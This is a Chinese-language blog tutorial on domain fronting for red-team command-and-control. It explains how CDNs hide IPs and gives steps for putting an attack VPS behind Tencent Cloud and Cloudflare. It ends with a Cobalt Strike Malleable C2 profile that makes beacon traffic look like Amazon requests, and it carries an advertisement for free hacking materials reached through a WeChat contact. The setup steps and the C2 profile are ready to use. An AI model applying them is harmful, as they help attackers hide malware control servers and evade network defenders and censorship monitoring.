域前置介紹

域前置又譯為域名幌子，是一種隱藏連接真實端點來規避審查的技術，在應用層上運作時，域前置使用戶能通過HTTPS連接到被屏蔽的服務，而表面上像在與另一個完全不同的站點通信，

域前置作業原理

域前置核心就是CDN，可以通過添加 A 記錄或 AAAA 記錄決議的方式將網站域名指向網站服務器公網 IP 地址，來實作用戶可以通過域名直接訪問已部署在服務器上的網站，而無需使用難記且無明顯標識的 IP 地址訪問，CDN能夠對域名進行加速，當對某個域名進行訪問時，并不會直接決議到IP，因此可以給攻擊VPS申請一個CDN加速服務，從而達到隱藏IP的效果

CDN作業原理

CDN又叫內容分發網路（Content Delivery Network）

當用戶訪問域名時，先請求LDNS(即本地dns)，如果有快取會回傳給用戶ip地址，如果LNDS無快取即向授權DNS請求，授權DNS決議域名回傳別名域名，域名決議請求發送至公有云DNS調度系統，則會分配最佳節點ip地址，LDNS會快取該IP地址，用戶根據該ip地址請求資源，節點ip隱藏了真實ip的地址，

搭建程序

這里選擇騰訊云的域名

先實名后注冊，注冊時間可能比較久，在騰訊云服務器上，根據申請的域名添加決議記錄，

域名備案，實際上國內的備案了之后Redteam已無法使用了，

【----幫助網安學習，以下所有學習資料免費領！加vx：yj009991，備注 “博客園” 獲取！】

　① 網安學習成長路徑思維導圖
　② 60+網安經典常用工具包
　③ 100+SRC漏洞分析報告
　④ 150+網安攻防實戰技術電子書
　⑤ 最權威CISSP 認證考試指南+題庫
　⑥ 超1800頁CTF實戰技巧手冊
　⑦ 最新網安大廠面試題合集（含答案）
　⑧ APP客戶端安全檢測指南（安卓+IOS）

注冊 cloudflare

https://www.cloudflare.com/zh-cn/

進入后添加站點

輸入申請的域名別名，選擇免費即可

繼續

這里會對域名的A記錄和CNAME自動進行檢測

這個時候郵箱會收到cloudflare的郵件，

修改dns記錄，域名注冊->我的域名->概覽位置修改dns

然后等待dns重繪即可，此時我們ping一下我們的域名發現，決議后的ip地址不是真實的ip地址，

ip地址為cloudflare的ip

nslookup查詢

SSL/TLS

如果要實作https加密需要下載配置c2證書

下載證書

在VPS需重新生成cs的組態檔cobalstrike.store

C2配置隱藏

專案地址

https://github.com/rsmudge/Malleable-C2-Profiles

set sleeptime "5000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
?
http-get {
?
    set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";
    
    client {
    
        header "Accept" "*/*";
        header "Host" "www.xxx.xxx";    #配置自己的根域名不是別名
    
        metadata {
            base64;
            prepend "session-token=";
            prepend "skin=noskin;";
            append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";
            header "Cookie";
        }
    }
    
    server {
    
        header "Server" "Server";
        header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
        header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Content-Encoding" "gzip";
    
        output {
            print;
        }
    }
?
}
?
http-post {
    
?
    set uri "/N4215/adj/amzn.us.sr.aps";
    
    client {
    
        header "Accept" "*/*";
        header "Content-Type" "text/xml";
        header "X-Requested-With" "XMLHttpRequest";
        header "Host" "www.xxx.xxx";   #配置自己的根域名不是別名
    
        parameter "sz" "160x600";
        parameter "oe" "oe=ISO-8859-1;";
    
        id {
            parameter "sn";
        }
    
        parameter "s" "3717";
        parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";
    
        output {
            base64;
            print;
        }
    }
    
    server {
    
        header "Server" "Server";
        header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";
        header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "x-ua-compatible" "IE=edge";
    
        output {
            print;
        }
    }
?
}